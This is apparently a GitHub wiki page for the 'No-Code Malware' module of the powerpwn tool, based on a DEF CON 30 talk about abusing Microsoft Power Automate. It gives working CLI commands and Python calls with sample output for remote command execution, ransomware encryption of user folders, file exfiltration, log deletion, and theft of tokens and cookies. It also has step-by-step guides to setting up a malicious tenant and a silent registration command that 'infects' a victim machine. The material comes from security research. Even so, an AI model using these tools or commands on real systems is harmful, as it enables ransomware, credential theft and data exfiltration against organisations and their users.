Skip to content

Modules: No‐Code Malware

Jump to bottom Edit New page
lanasalameh1 edited this page Aug 2, 2023 · 12 revisions

Description

Repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

This capability was first presented at a DEFCON30 talk titled No-Code Malware - Windows 11 at Your Service:

DEF CON 30 - Michael Bargury - No-Code Malware - Windows 11 at Your Service

Usage

Setup

Zip and import solution pwntoso_1_0_0_1 provided in nocodemalware module.

powerpwn cli

  • Available commands are steal-cookies, steal-power-automate-token, steal-power-automate-token, ransomware, exfiltrate, cleanup
  • Run powerpwn nocodemalware -w {webhook url to the relevant flow} {command} -h for available options for each command.

Python library

from powerpwn.nocodemalware.enums.code_exec_type_enum import CodeExecTypeEnum
from powerpwn.nocodemalware.malware_runner import MalwareRunner

POST_URL = ""
mw_runner = MalwareRunner(post_url=POST_URL)

### code execution

# python2
mw_runner.exec_command("print('hello world')", CodeExecTypeEnum.python).cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
mw_runner.exec_command("bad syntax", CodeExecTypeEnum.python).cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
mw_runner.exec_ps("Write-Host \"hello word\"", CodeExecTypeEnum.powershell).cmd_code_execution

# commandline
mw_runner.exec_command("echo \"hello word\"", CodeExecTypeEnum.commandline).cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

mw_runner.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

mw_runner.exfiltrate(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=True, FileContents='asd')
mw_runner.exfiltrate(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

mw_runner.cleanup().cmd_cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

mw_runner.steal_power_automate_token().cmd_steal_power_automate_token
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie
mw_runner.steal_cookie("https://www.google.com").cmd_steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')

How To

How to set up your cloud environment

Set up a malicious Power-Pwn Microsoft tenant

  1. Set up your free Microsoft tenant by following Microsoft guidelines

    Pwntoso tenant

  2. Create a malicious user account and assign it a Power platform administrator role. The admin role isn't necessary, it's just convenient.

    Power platform administrator role

  3. On a private browser tab

    1. Go to https://flow.microsoft.com and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license.

    2. Follow the same process with https://make.powerapps.com to initiate a Power Apps trial license.

  4. Create a Service Principal by following Microsoft guidelines and note the tenantId, applicationId and secret.

Infect a test victim machines

  1. Infect a test machine by following the How to infect a victim machine guide.

  2. Verify that the machine has been onboarded

    1. Log into https://flow.microsoft.com as the malicious user

    2. Click Go to Monitor and then Machines and verify that the test victim machine is there

    Victim machines

Upload pwntoso to your Power Automate cloud environment

  1. Log into https://flow.microsoft.com with the malicious user.

  2. Go to Solutions and click Import solution

    Import pwntoso solution

  3. Zip the content of pwntoso_1_0_0_1 and select it when asked to provide a solution file. Follow the guided process to completion.

    1. When asked to provide a connection, following the guided process to create a new machine connection. Use the test victim machine credentials.

  4. Go to My flows and search for Endpoint

    Endpoint flow

    Click on Edit and then on When a HTTP request is received and copy the URL under HTTP POST URL

    HTTP Post URL

  5. Note the HTTP Post URL for use with the Python module.

How to infect a victim machine

To register a victim machine, recall the , and you got from following the cloud setup guide and run the following command

echo <secret> | C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe -register -applicationid <applicationId> -tenantid <tenantId> -clientsecret -force

That's it! For troubleshooting, refer to Microsoft Docs.

How to troubleshoot execution errors

SessionExistsForTheUserWhenUnattended

Got success=False with code=SessionExistsForTheUserWhenUnattended in unattendedError?

Got to Machines -> locate the machine -> three vertical dots -> Edit details -> Reuse sessions for unattended runs. See reuse sessions for unattended runs

Add a custom footer
Add a custom sidebar
Clone this wiki locally